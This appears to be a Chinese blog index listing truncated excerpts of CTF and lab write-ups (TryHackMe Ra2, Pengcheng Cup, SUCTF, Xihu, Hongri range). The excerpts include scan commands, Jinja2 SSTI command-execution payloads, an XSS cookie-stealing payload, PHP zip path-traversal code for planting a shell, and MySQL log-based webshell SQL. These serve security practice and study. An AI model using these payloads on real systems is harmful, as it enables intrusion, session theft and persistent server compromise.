THM-Ra2
本关讲的是个DNS投毒+SeImpersonatePrivilege提权 nmap -v –min-rate 10000 10.10.113.180 -p- nmap -T4 -n -sC -sV -Pn 10.10.113.180 -p 53,80,88,135,139,389,443,445,464,593,636,2179,3268,3269,3389,5222,5223,5229,5262,5263,5269,5270,5275,5276,7070,7443,7777,9090,9091,9389,49667,49668,49669,49670,49671,49687,49699 firefox报错了,👇扫扫目录 1./gobuster dir -k -u https://fire.windcorp.thm -q -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt PFX 文件用工具暴力破解密码然后连接 123456crackpkcs12 -d...
THM笔记
THM笔记部分太过简单就不再记录 Medium上有很多wp,可以借鉴 基础知识IPInternet protocol 网络地址192.168.1.1 主机地址192.168.1.101 默认网关192.168.1.255 向别的网关发送数据 MAC地址Media Access Control 前6个字符代表制造网络接口的公私,后六个字符是一个唯一的数字 LAN连接方式拓扑(Topology 星型 通过交换机或集线器连接 添加方便,成本高,不适合大规模 总线拓扑 有主干电缆, 成本低,排查困难 环形拓扑 一个坏就全完 特性 集线器(Hub) 交换机(Switch) 中继器(Repeater) 工作层次 物理层(Layer 1) 数据链路层(Layer 2) 物理层(Layer 1) 数据传输 广播所有端口 根据 MAC 地址定向转发 放大并转发信号 带宽 所有端口共享带宽 每个端口独立带宽 无带宽概念,仅用于信号放大 智能 无智能,仅转发数据 智能转发数据,避免广播 无智能,仅放大信号 ARPAddress Resolution...
2024鹏程杯
鹏程杯python口算1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950import requestsimport re# 发送 GET 请求获取算式def get_calculation_problem(url): response = requests.get(url) if response.status_code == 200: return response.text else: print("Failed to retrieve the calculation problem") return None# 解析算式并计算答案def calculate_answer(problem): # 使用正则表达式提取算式 #calculation = re.search(r'<h1>(.+?)</h1>',...
vnctf2025javaGuide
javaGuide先试了试别的师傅的wp,学习了一下二次反序列化 https://www.cnblogs.com/LAMENTXU/articles/18705991 https://xz.aliyun.com/news/15977 https://tttang.com/archive/1701/ 原版payload123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135package org.example.fj2.num3;import...
25西湖
2025西湖冬季文章所有参考将在文末给出 webweb1ssti 太简单的不赘述,知道用就行 1{{cycler.__init__.__globals__.__builtins__['__import__']('os').popen('$(printf "\150\145\141\144\40\57\146\154\141\52")').read()}} 赘述 1个admin");alert(document.cookie);("能弹出admin web2先是弱口令爆破 12密码year2000用户admin 上传的php文件会被删除,条件竞争 普通脚本12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667import ioimport...
25suctf
Suctf2025–2标识为看的wp,没环境复现了 所有参考资料将在文本末尾标明 WEBSU_photogallery思路👇 构造一个压缩包,解压出我们想解压的部分,然后其他部分是损坏的,这样是不是就可以让整个解压过程是出错的从而进入到if里,我们的shell就这样留下了 先是php版本的漏洞 再根据源码漏洞上码 三种写码方法如下👇 法一12345678910111213<?php$zip = new ZipArchive();$zipFilePath = 'exp.zip';if ($zip->open($zipFilePath, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { $zip->addFile('1.php', "..\./..\./a.jpg"); $zip->close(); echo "ok";}?> 配上 12345GET...
25春秋杯
春秋杯文章所有内容部分来自自己写的,部分来自各路非公开wp,部分来自公开wp(附上链接,在文章末尾) easy_flask1{{().__class__.__mro__.__getitem__(1).__subclasses__()[133].__init__.__globals__['popen']('cat+flag').read()}} 1{{[].__class__.__base__.__subclasses__()[394]('cat /app/flag',shell=True,stdout=-1).communicate()[0].strip()}} copy1https://github.com/synacktiv/php_filter_chains_oracle_exploit?tab=readme-ov-file 1python3 filters_chain_oracle_exploit.py --target ...
2025元旦渗透赛复现-ctfshow
2025ctfshow元旦渗透赛第一章flag1-压缩包压缩包密码爆破 flag2-图片-密码压缩包里面有个图片 PNG 文件的尾部标识符 49 45 4E 44 AE 42 60 82 提取出后边多余的文件base64解密👇出来个这个 1234567if __name__ == '__main__': try: import secretMessageResponse except ImportError: import pip pip.main(['install', 'secretMessageResponse']) from secretMessageResponse import printMessage 拿python运行一下没出来一堆数据 去找库👇 pip show secretMessageResponse crypto环境问题from Crypto.PublicKey import RSA...
2024第一场ciscn-ctfshow复现
2024ciscn第一场本章内容均在ctfshow复现 sanicpython污染 源码123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354from sanic import Sanicfrom sanic.response import text, htmlfrom sanic_session import Sessionimport pydash# pydash==5.1.2class Pollute: def __init__(self): passapp = Sanic(__name__)app.static("/static/", "./static/")Session(app)@app.route('/', methods=['GET', 'POST'])async def index(request):...
红日靶场12457
+红日靶场1配置说明:虚拟机所有初始密码都为hongrisec@2019(后面需要改密码,自己设置) 12我修改为 win7 要把打印机协议打开 1234本地--域192.168.52.143本地5192.168.57.3 win2008 12本地192.168.52.138 win2k3 1192.168.236.141 在win7的phpstudy打开服务,打不开就重启一次 本地可以访问,其他用户无法访问 1https://blog.csdn.net/liuhhaiffeng/article/details/72137102 开打1nmap -sV 192.168.57.3 漏洞点一rogue_mysql任意文件读取,但是得盲猜,还要当前用户有权限 二 数据库弱口令日志写码1234查看日志状态: show variables like '%general%'; 开启general_log为True: SET GLOBAL general_log='on'; 执行命令指定日志写马: SET GLOBAL...